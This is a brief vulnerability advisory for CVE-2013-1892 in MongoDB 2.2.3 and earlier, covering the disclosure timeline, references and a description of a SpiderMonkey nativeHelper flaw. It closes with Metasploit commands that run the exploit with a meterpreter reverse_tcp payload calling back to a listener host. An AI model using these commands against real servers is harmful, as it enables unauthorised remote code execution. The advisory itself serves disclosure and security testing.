Timeline :
Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix the 2013-03-24
Metasploit PoC provided the 2013-03-27
PoC provided by :
Reference(s) :
CVE-2013-1892
OSVDB-91632
BID-58695
Affected version(s) :
MongoDB 2.2.3 and previous
Tested on Ubuntu 10.04 x86 with :
MongoDB 2.2.3
Description :
This module exploits a the nativeHelper feature from spiderMonkey which allows to control execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.
Commands :
use exploit/linux/misc/mongod_native_helper set RHOST 192.168.178.53 set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit sysinfo getuid